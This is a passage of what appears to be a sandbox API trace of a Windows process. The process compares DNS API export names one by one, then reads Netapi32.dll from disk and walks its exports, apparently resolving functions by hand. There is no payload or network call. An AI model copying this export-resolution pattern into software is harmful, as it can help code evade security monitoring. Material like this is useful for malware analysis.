(lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0272.113] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0272.113] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.113] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0272.113] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.113] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.113] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0272.113] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0272.113] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.113] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0272.113] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0272.113] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.113] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.113] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0272.113] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0272.113] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.114] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0272.114] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0272.114] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0272.114] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0272.115] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0272.115] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.115] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.115] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.115] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0272.116] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0272.117] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0272.118] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0272.118] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0272.119] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.119] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0272.120] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0272.121] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0272.121] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.121] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.121] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0272.121] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0272.122] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0272.125] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0272.126] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0272.269] GetProcessHeap () returned 0x400000 [0272.269] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x396d010 | out: hHeap=0x400000) returned 1 [0272.269] GetProcessHeap () returned 0x400000 [0272.269] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419360 [0272.269] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0272.272] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0272.272] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0272.273] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0272.273] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0272.274] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0272.274] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0272.274] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0272.274] GetProcessHeap () returned 0x400000 [0272.274] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13b00) returned 0x2c35030 [0272.274] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0272.274] ReadFile (in: hFile=0x17c, lpBuffer=0x2c35030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c35030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0272.274] CloseHandle (hObject=0x17c) returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0272.275] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 